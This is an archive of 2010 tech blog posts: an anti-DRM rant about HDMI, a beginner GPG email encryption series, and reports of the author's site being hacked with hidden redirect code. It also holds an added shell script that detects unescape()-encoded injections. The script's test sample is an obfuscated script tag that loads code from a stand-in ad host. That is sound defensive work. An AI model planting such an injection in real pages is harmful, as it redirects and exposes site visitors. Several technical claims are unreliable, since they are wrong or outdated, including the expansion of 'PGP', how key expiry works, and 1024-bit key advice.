Why HDMI Is Evil

You’ve all heard the buzzwords. High-Def, 1080p, HDMI, Blu-Ray. The list goes on and on. It’s all garbage, nothing more than marketing hype to make you buy into the “magic pill” the entertainment industry is selling you.

“You’re off your rocker, old man,” you say. I can see you rolling your eyes, shaking your head at my old-school stupidity. “Everybody knows HDMI is cool. It’s a one-wire hookup, gives unequalled definition, is the only format that does 1080p, ends world hunger, etc.”

Sadly, all of the reasons in that last sentence are false, except for one. HDMI is truly a 1-wire hookup. Other than that, it provides absolutely no advantages over technology that we already have for end-users. NONE.

“But what about 1080p video?” Guess what? It’s been available in studio-quality component video decks for years. 3-wire component video will easily output 1080p video and higher, with one very important thing missing: the digital copyright protection. This is why even if you buy an HD disk player, it won’t output HD content to the component outputs. That’s why the Playstation 2 and XBox360 won’t play HD video over component… you can only play games in HD unless you use the HDMI connector because analog outputs don’t support Copyright protection (which will become required in 2012).

“What about digital signal quality? Isn’t HDMI better because it’s digital?” In a word, no. You’re limited to very short cable runs, zero fault tolerance, higher cost, and at a true 1080 resolution, you’d have a hard time telling the difference visually. It’s all hype. And as far as sound goes, the digital format is already covered. And what’s more, 90% of the content that is advertised as “1080p” isn’t really, it’s upscaled, interpolated, or antialiased from lower content… but you can only tell the difference when comparing it to true HD 1080p 60hz content, like Discovery’s Planet Earth series which was shot in all 1080p 60 hz.

“Isn’t DRM (Digital Rights Management) good? Isn’t it protecting companies from piracy?” In a word, no. They’d like you to believe “big bad pirates” are stealing all their money. The truth is, DRM has never been about piracy. Over the years many companies have tried to limit the way paying customers use the media they “buy.” Bet you didn’t know this, but 99% of DVDs sold in stores still, to this day, are encrypted so you can’t play them on an unlicensed device. And they only sell licenses to companies they want to. The only way I can play them on a Linux computer is if I install “legally questionable” CSS decryption software… even though I paid for the DVD. I’m also supposed to buy a CSS DVD player to watch them.

“No big deal,” you might think. “What’s wrong with having to buy a Blu-ray player to watch Blu-rays?” The problem is that it doesn’t stop there. The entertainment industry isn’t interested in stopping piracy, for the most part… they want to control your movie watching experience, from beginning to end, the way they want you to. You want to use a sound clip from a movie you bought to use as a ringtone? Can’t do that. Want to load the movie onto your iPhone to watch? Can’t do that. Want to skip the stupid previews on the disk? Nuh-uh. Want to watch it on a different TV/console in your house, from a media server, at full resolution? Absolutely no way, man. Got an older HD TV that will do 1080 but has no HDMI port? You’re out of luck, chump. Got a computer monitor you want to watch 1080 video on? Has to have special hardware and software to do it with. If you have a digital HD DVR, you better be taking notes… this will affect you in the future.

Do you know why they’re phasing out analog TV, cable, and analog video outputs in general? It’s called “the analog loophole” by the industry, and they hate it. They’re not interested in “giving you the best experience.” For them, DRM is about two things: CONTROL and MONEY. They are terrified of digital DVRs, and will do whatever they can to lock down that content, in order to be able to charge you for watching it at your leisure. If they can force you to pay to watch what you want, on top of the charge you’re already paying to see it, they love it. They already have rental movies that “expire” and they are going to try to make cable, satellite, and HD disks the same way.

“Aren’t you just being cheap? What’s wrong with just buying a new entertainment system?” This is where I slap my forehead and roll my eyes at you.

I shouldn’t have to buy thousands of dollars of equipment to watch high-def video. If I want to, that’s fine… but it should not be required, when the technology is already cheaply available. You are not paying for HD content… you are paying for the enormous cost of upgrading your entire entertainment center just so it supports the industry’s anti-freedom policies. In the next few months, it will be illegal to build or buy AV equipment that doesn’t support the AACP standards. In the next year or two, it will be illegal to broadcast non-digital content over the airwaves. And in 99% of the TVs you buy today, you’re not getting true 1080p video to it, anyway… it’s limited by the source.

I’m going to fight it as long as I can. I see no need to dole out thousands of dollars just so I can enjoy a movie when I want to watch it. Call me a luddite, call me a retro freak, I don’t care… I don’t like people telling me how I can enjoy my entertainment.

Posted on February 22nd 2010 in News, Security

Basics Of Encryption pt. 5

At this point, if you’ve read through the Encryption article series, you’ve got a pretty good idea of what encryption does, and how it works. So what else is there left to cover? This is the “Skip to the end” part of the series… I’m just going to show you step-by-step how to set up usable GPG encrypted mail in Linux. No fuss, no hassle.

You only need two programs to do this, but a third (key manager) will make it easier.

First: install GPG for your distro of Linux. If you’re running Ubuntu or Debian, then

sudo apt-get install gpg

But whatever you use to manage software for your system, you should be able to find “GPG” and install what it needs.

Second, you need to create a new key pair (public and private). Make sure you use an email address that will not disappear in a year or two! This email address is your key’s form of identification.

gpg --gen-key

This will start the key generation process. Just follow the instructions, the defaults will work fine. Come up with a fairly long password… and DO NOT forget it!

Third, install some sort of email client with GPG plugin support. I use Mozilla Thunderbird with the Enigmail add-on. I also use a program called Kgpg to manage my keys. It runs in the tray and lets me encrypt/decrypt things on the clipboard. Not necessary, just makes things much easier.

Once you’ve installed your mail client, it should automatically pick up your GPG key (it’s set to import your local GPG keys automatically) and you can then either send your public key to your friends, post it to your website, or even upload it to a key server. Most key management programs have a feature that lets you upload your public key to an internet keyserver.

And that’s it. You’re done! When you send mail, just use the OpenPGP menu to find the recipient’s email address, and if they have one on a keyserver, it will automatically retrieve their public key and encrypt the message to them. Likewise, it will automatically decrypt messages sent to you if you want.

Easy cheesy!
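
The same steps, run non-interactively against a throwaway keyring so the result can be checked end to end. This is an added example, not part of the original post; it assumes GnuPG 2.1 or later, and the name, address and message are constructed.

```sh
#!/bin/sh
# Added example: key generation, fingerprint, export, encrypt and decrypt
# in a scratch keyring. Name, address and message are constructed.
set -eu

gpg_roundtrip() (
    GNUPGHOME=$(mktemp -d); export GNUPGHOME   # scratch keyring, ~/.gnupg untouched
    chmod 700 "$GNUPGHOME"
    addr='demo@example.org'

    # Key pair (the "gpg --gen-key" step). The empty passphrase is acceptable
    # only because this key is deleted below; a real key needs a long one.
    gpg --batch --quiet --pinentry-mode loopback --passphrase '' \
        --quick-generate-key "Demo User <$addr>" default default 1y 2>/dev/null

    # Fingerprint: the string you compare with the key owner out of band.
    fpr=$(gpg --batch --with-colons --list-keys "$addr" |
          awk -F: '$1 == "fpr" { print $10; exit }')

    # Public half, ASCII-armored: this is the part you hand out or upload.
    gpg --batch --armor --export "$fpr" > "$GNUPGHOME/demo-pub.asc"

    # Encrypt to the public key, then decrypt with the private key.
    printf '%s' 'meet at noon' |
        gpg --batch --quiet --armor --recipient "$fpr" --encrypt \
            > "$GNUPGHOME/msg.asc"
    plain=$(gpg --batch --quiet --pinentry-mode loopback --passphrase '' \
                --decrypt "$GNUPGHOME/msg.asc" 2>/dev/null)

    gpgconf --kill gpg-agent 2>/dev/null || true
    rm -rf "$GNUPGHOME"
    printf '%s %s\n' "${#fpr}" "$plain"   # fingerprint length, recovered text
)

# Run the demo when gpg is installed.
if command -v gpg >/dev/null 2>&1; then gpg_roundtrip; fi
```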

Posted on February 9th 2010 in Linux, Security

Definitely was hacked.

Thankfully it wasn’t anything serious. I managed to find a few bits of stealthed code, and it’s been taken care of.

How did this happen? Let’s look at the attacker’s IP address (since everything that hits the site is logged). I do a “whois” search on the IP address, and find that it’s assigned to a company in California, that uses Bluecoat web proxy filtering. Ding ding ding, there’s the problem right there.

Most likely what happened is that someone found a weakness in one of their proxy servers (which are notorious for having weaknesses) and used it as a portal to launch an attack on my website, which was to add a few lines of hidden code where I wouldn’t notice it, but would cause redirects to sites with ads for that person’s personal benefit. Chances are if they had done something drastic, I would have noticed earlier.

This is a perfect example of why people need to learn more about security… I will be upgrading my WordPress engine shortly. Again, sorry if you got redirected, and God help whoever hacked it if I ever find out who it was (not likely).

Posted on February 3rd 2010 in News, Security

If You’ve Been Redirected…

I’m sorry. I just figured out something got added to my website’s code without my knowledge that causes anyone loading my blog to get redirected to sites I don’t link to.

How is that possible? Well, there’s a few ways it could happen. Either someone hacked my WordPress account, or the code was there in the theme and I didn’t catch it, or there’s an exploit in this version of WordPress they used to modify files.

I’m guessing nobody actually hacked my account, but I’ll change passwords just to make sure. My guess is that the unescape code (a trick where they use a JavaScript function to ASCII encode and hide stuff) was already there in the theme, and I just didn’t catch it. Regardless, if you got redirected, I apologize. The code has been removed, and if it pops up again, I will know it wasn’t me that put it there.
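
One way to check a theme for this kind of hidden code is to find every unescape('...') literal and print what it decodes to. This is an added example, not code from the site; the function names, the "SUSPECT" heuristic and the sample file are constructed.

```sh
#!/bin/sh
# Added example: list each unescape("...") literal under a directory with its
# decoded text, so hidden markup or URLs become readable.

scan_unescape() {   # usage: scan_unescape /path/to/wp-content/themes/mytheme
    find "$1" -type f \( -name '*.php' -o -name '*.js' -o -name '*.html' \) \
        -exec awk '
    function hexval(c) { return index("0123456789abcdef", tolower(c)) - 1 }
    function pct_decode(s,    out) {          # turn each %XX into its byte
        out = ""
        while (match(s, /%[0-9A-Fa-f][0-9A-Fa-f]/)) {
            out = out substr(s, 1, RSTART - 1) sprintf("%c",
                  hexval(substr(s, RSTART + 1, 1)) * 16 + hexval(substr(s, RSTART + 2, 1)))
            s = substr(s, RSTART + RLENGTH)
        }
        return out s
    }
    {
        line = $0
        while (match(line, /unescape\([ \t]*["\047][^"\047]*["\047][ \t]*\)/)) {
            enc  = substr(line, RSTART, RLENGTH)
            rest = substr(line, RSTART + RLENGTH)   # saved: pct_decode calls match()
            sub(/^unescape\([ \t]*["\047]/, "", enc)
            sub(/["\047][ \t]*\)$/, "", enc)
            dec = pct_decode(enc)
            # Decoded script tags, iframes or URLs are what a hidden redirect needs.
            tag = (tolower(dec) ~ /location|<iframe|<script|document\.write|https?:/) ? "SUSPECT" : "review"
            printf "%s:%d: %s: %s\n", FILENAME, FNR, tag, dec
            line = rest
        }
    }' {} +
}

demo_scan() (       # constructed theme file, not taken from the affected site
    dir=$(mktemp -d)
    cat > "$dir/footer.php" <<'EOF'
<?php /* constructed sample */ ?>
<script>document.write(unescape('%3Cscript%20src%3D%22http%3A//ads.example.invalid/r.js%22%3E%3C/script%3E'));</script>
<script>var greeting = unescape("%48%65%6C%6C%6F");</script>
EOF
    scan_unescape "$dir"
    rm -rf "$dir"
)
demo_scan
```

A "review" line is not a clean bill of health; it only means the decoded text did not match the redirect heuristic and still deserves a look.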

Posted on February 3rd 2010 in News, Security

Basics of Encryption pt. 4 (Public Keys and Trust)

In the last few articles on GPG encryption, we talked about software, and generating a private key. Now we come to the part where we put out our public key which will let others send us encrypted messages, and get other people’s public keys which let us send messages to them.

Ideally, you would personally give your public key to a friend, and they would give you theirs. You would know 100% it came from them. However, sometimes you want to send things to people you can’t meet, and it’s also possible for someone to falsify an encryption key with someone else’s email address… which would let them read it if they had the matching private key.

This introduces something called trust. Let’s say my friend sends me his public key. I trust him, I know his key is correct, and I trust it’s secure. I can then sign his key and verify it’s secure. I can also assign it a level of trust that tells me how much I can rely on it.

Normally, you’re going to only mess with keys from people you know. However, an interesting feature of GPG encryption is that you can encrypt a message or file to more than one person at a time! If you specify more than one public key to encrypt it, then any one of those keys can decrypt the message. This is why it’s important to verify trust! You may know person “A” very well, but unless you know every single person you’re encrypting to, there’s potential for hacking or foul play. You can read up more on trust at GPG’s website. It’s worth a read, but it’s beyond the scope of this article.

There is also a way to verify a key without meeting the person directly: each key has what’s called a fingerprint. This is a string of letters that lets you verify the key is from who they say it is. You can contact the actual person by phone, chat, etc. and if the string they read off matches their key’s fingerprint, then you know it’s from them. You can then sign it to verify it’s trusted.

Posted on January 31st 2010 in Linux, News, Security

Basics of Encryption 3.5 (setting up a secure mail client)

This is kind of an extension on part 3 of my articles on GPG encryption. I talked very little about front-ends for GPG, so I’ll give you a quick simple (and free) way to use GPG for basic email encryption and signing.

Since I’m using Ubuntu Linux, I have a few options as to what program I’m going to use for sending and receiving mail. I’ve decided to use Mozilla Thunderbird, which is a free, fairly basic email/RSS program. However, what I’m really interested in is an add-on for it called Enigmail which integrates GPG security when you send/receive emails.

With Thunderbird, you set up your email accounts like normal. Thunderbird supports several mail server types, so it will work fine for most people. If you need support for Exchange mail servers, you can look into a mail client called Evolution for Linux.

Posted on January 29th 2010 in Linux, Security

Basics Of Encryption pt. 3 (Private Keys)

Once we’ve installed GPG and some sort of frontend, we need to create a private key to decrypt messages people send to us. Since there are too many frontends to go through them all, we’re going to cover the basics and creating a key pair with the GPG command line.

There is actually more than one kind of encryption, but what most people will want to use (for emails) is called a public-key cipher, which means you give people your public key, and you have a secret, private key that decrypts it. To keep your data secure, keeping your private key safe is critical! If a hacker gets hold of it, they can brute force the password and unlock all of your data… so don’t keep it on a computer that’s open to attack!

GPG keys use email addresses as identifiers, and you can add more than one subkey… which means you can add multiple addresses, or even a small photo for ID purposes. For most purposes, we will generate a key that is 1024 bits long, which is a good balance of security and speed of decryption. With modern computers, it may be possible to use keys larger than 1024 bits without slowdown during decryption, but 1024 is still a good starting point.

Your key also has an expiration date if you choose it. That means it is only good for a certain time, after which it won’t decrypt anything, even if someone knows the password.

So are you ready to generate a keypair? Here we go!

Posted on January 26th 2010 in Linux, Security

Basics Of Encryption pt. 2 (software)

Once we have a need for encryption, the next question is “What do I need to use it?” The answer, of course, is a program that is made for encrypting things. There are very few places you can get encryption software, but when talking about key encryption, two names immediately come to mind: PGP and GPG (no, that’s not a typo).

PGP stands for “Pretty Good Protection” and is a private company. They offer more than just simple key encryption software. They have tools that let you encrypt an entire hard drive, and still use it normally. Without the key, nobody can see what’s on it once it’s shut off. Their basic software used to be free, but it is now non-free… which rules it out, in my book. Unless you need their specific server software (which isn’t the goal of this series of articles) and are willing to dole out money, let’s look at our other option.

Posted on January 25th 2010 in Linux, Security

Basics Of PGP Encryption (introduction)

Some of you may have heard of computer encryption, and never thought about it. What exactly is encryption?

In cryptography, encryption is the process of transforming information (referred to as plaintext) using an algorithm (called cipher) to make it unreadable to anyone except those possessing special knowledge, usually referred to as a key. The result of the process is encrypted information.

So what does that mean for you and me? Well, with encryption, it becomes possible to “scramble” information so that only the people you specify can decrypt and read it. It’s very likely that you already use this technology without even knowing it. If you use a secure socket layer (SSL) connection to a website, that uses encryption. That way the data can only be understood by the computer on the other end, and any virtual wiretappers can’t make sense of it. It’s very likely that your wi-fi internet connection uses encryption, too (and if not, should!)

Most people think they will never need personal encryption, but it can be used for more than just scrambling data. You can digitally sign something to prove that you wrote it, or that it came directly from you. It is like a digital fingerprint, and only you can possess it.

In its very most basic form, it is an equation. An encryption key is made of two parts: the public key and the private key. Let’s say you want to send a message to somebody, and you only wanted them to be able to read it. You have that person’s public key, which lets you scramble the message, and only someone with that exact matching private key can unscramble it.

So let’s break this down into sections:

  1. Introduction
  2. Getting the software
  3. Setting up your personal public/private keys
  4. Getting public keys of friends you trust
  5. Encrypting data

I’ll walk you through each of these steps, and when finished, you’ll be able to send and receive encrypted messages and data to and from someone else that uses encryption. Stay tuned for part 2: Software!

Posted on January 24th 2010 in Linux, Security

Open Source is Freedom!

Have you ever been frustrated with Microsoft Windows always giving you problems, but couldn’t justify the money to buy a Mac?

I feel your pain! As a technician in the I.T. industry for the last 12 years, I’ve seen more problems with Windows than I care to remember. Viruses, spyware, malware, driver instability, performance issues, incompatibilities, crashes, forced upgrades, and inflexible licensing schemes…

Posted on May 18th 2008 in Linux, Security